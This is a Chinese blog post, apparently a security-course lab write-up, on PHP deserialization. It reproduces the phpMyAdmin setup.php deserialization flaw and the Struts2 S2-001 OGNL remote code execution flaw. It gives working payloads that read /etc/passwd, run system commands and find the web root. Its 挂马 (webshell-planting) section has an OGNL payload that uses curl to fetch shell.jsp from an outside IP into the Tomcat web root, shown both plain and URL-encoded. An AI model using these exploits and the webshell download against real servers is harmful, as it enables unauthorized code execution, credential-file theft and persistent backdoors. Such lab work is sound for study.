反序列化漏洞——http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞 http://159.75.16.25

最新推荐文章于 2024-05-03 19:26:50 发布
最新推荐文章于 2024-05-03 19:26:50 发布
阅读量400 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52341820/article/details/124177327
版权
本文深入探讨了PHP反序列化漏洞的原理及其危害,强调了防御措施,如签名验证、限制序列化类以及RASP检测。同时,详细介绍了Struts2 S2-001远程代码执行漏洞的利用过程,包括文件读取、路径遍历和命令执行,并提供了复现漏洞的步骤。挂马操作展示了如何利用此漏洞在目标服务器上植入恶意代码。此外,还提到了如何识别Struts2框架网站以及该漏洞的触发条件。
摘要由CSDN通过智能技术生成

php反序列化漏洞的漏洞原理,如何防御此漏洞?如何利用此漏洞?

原理:

未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果

防御:

  1. 进行签名与认证,避免应用接受黑客的异常输入
  2. 限制序列化与反序列化的类,避免接受任何处理类型
  3. RASP检测,判断应用是否执行了非应用本身的逻辑

利用:

  1. 通过该漏洞,可以在内容中嵌入执行自定义命令的代码,获取服务器的权限
  2. 可以构造其他,导致耗尽服务器的CPU,停止服务
  3. 可以获得途径

2、http://159.75.16.25:8066       phpmyadmin scripts/setup.php 反序列化漏洞

      http://159.75.16.25:8065      复现S2-001远程代码执行漏洞

复现漏洞要求:(1)操作步骤配截图。

                      (2)并尝试使用S2-001远程代码执行漏洞进行挂马操作 。

                      (3)在linux中/etc/passwd和/etc/shadow这两个文件分别存储什么内容?如果一旦攻击者获取到这两个文件可以做什么?

漏洞背景:PhpMyAdmin 2.x 版本中存在一系列反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行代码。

漏洞复现:启动环境,可以看到phpmyadmin的首页,因为没有连接数据库,所以会进行页面报错。

http://159.75.16.25:8066       phpmyadmin scripts/setup.php 反序列化漏洞

  • 打开该url,出现phpmyadmin首页。

之后打开scripts/setup.php:

  • 打开终端进行攻击:

使用burusuite进行抓包,打开火狐代理,将抓到的包部分数据改为:

POST /scripts/setup.php HTTP/1.1

Host: 10.40.189.19:8080

之后点击go,即可得到下图内容

  • 返回网页,也可得到关于root passwd的相关内容,复现完成。

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

http://159.75.16.25:8065      复现S2-001远程代码执行漏洞

漏洞简介:

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

  • 在输入框中输入%{1+2},发现被解析成了3,说明在此处存在漏洞。

  • 输入以下命令获取tomcat绝对路径:

%{"tomcatDir{"+@java.lang.System@getProperty("user.dir")+"}"}

得到tomcat的绝对路径:

tomcatDir{/usr/local/tomcat}

  • 输入以下命令获取web路径:

%{

#req=@org.apache.struts2.ServletActionContext@getRequest(),

#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),

#response.println(#req.getRealPath('/')),

#response.flush(),

#response.close()

}

得到web路径为:/usr/local/tomcat/webapps/ROOT/

  • 输入以下命令查看当前权限:

%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

返回为root

  • 对web路径命令进行修改:

%{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),#f.getWriter().close()

}

之后将修改后的命令输入到password中:

复现完成。

挂马:

  • 在此页面使用burpsuite抓包,

  • 需要使用到burpsuite进行抓包

挂马命令如下:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"curl","-o","/usr/local/tomcat/webapps/ROOT/shell.jsp","http://106.52.39.144:82/shell.jpg"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

在火狐浏览器中将该挂马冰凌进行url编码:

%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22curl%22%2C%22-o%22%2C%22%2Fusr%2Flocal%2Ftomcat%2Fwebapps%2FROOT%2Fshell.jsp%22%2C%22http%3A%2F%2F106.52.39.144%3A82%2Fshell.jpg%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D

将抓到的包的password改为该编码后的内容:

在burpsuite中:

之后点击forword放包,浏览器页面显示为:

之后连接

  • 连接成功后可以进行数据库管理和文件管等操作,则挂马成功

3、如何能看出一个网站用了struts2框架?并简述S2-001远程代码执行漏洞原理

看网站链接url里面的内容,如果是XXX.action结尾或直接XXX?参数1=XXX,应该就是用了stuts2框架。

原理:

因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。

安全大牛(未来版)
关注
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1780
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_34343308的博客
03-21 2685
phpMyAdmin (/scripts/setup.php) PHP 注入代码 此漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu ...
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 465
Phpmyadmin Scripts / setup.php反序列化漏洞(WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 580
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
phpmyadmin scripts/setup.php 反序列化漏洞攻击实验
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-07 958
msf攻击phpmyadmin 4.0x - 4.6.2 远程代码执行漏洞Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433) deserialization n 反序列化,还原序列化 目标(被攻击)计算机搭建漏洞环境: 攻击计算机启用漏洞攻击模块: 目标(被攻击)计算机退出漏洞环境: 攻击计算机退出漏洞攻击环境: ...
phpmyadmin scripts/setup.php 反序列化漏洞 S2-001远程代码执行漏洞复现漏洞要求:
记录笔记
04-12 227
phpmyadmin scripts/setup.php S2-001远程代码执行漏洞复现漏洞 我们在密码处输入:%{2*2} 会回显出执行的结果,说明漏洞可能存在 %{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+“}”} %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get(“com.opensymp
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 383
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_33736649的博客
06-19 423
影响版本: phpMyAdmin phpMyAdmin 3.xphpMyAdmin phpMyAdmin 2.11.x 漏洞描述: phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdminSetup脚本用于生成配置。如果远程***者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php 配置文件中包含...
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 588
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
EC_Carrot的博客
07-20 257
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 这个漏洞无需链接数据库,与数据库无关。 漏洞复现 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compati
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3900
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
[Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 881
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
phpmyadmin scripts/setup.php 反序列化漏洞复现
weixin_56513549的博客
02-23 2040
首先在password地方输入%{1+1} 发现解析成了2,说明存在该漏洞 输入 %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 获取Tomcat执行路径 获取web路径 %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatch..
第三方应用漏洞phpmyadmin scripts/setup.php 反序列化
qq_39756628的博客
04-26 713
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少。 影响版本:已知版本为 2.8.0.3、2.8.04 启动环境 cd /root/vulhub/phpmyadmin/WooYun-2016-199433 docker-compose up -d 环境启动后,直接在浏览器中访问http://192.168.0.107:8080,即可看到phpmyadmin的首页。因为没
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值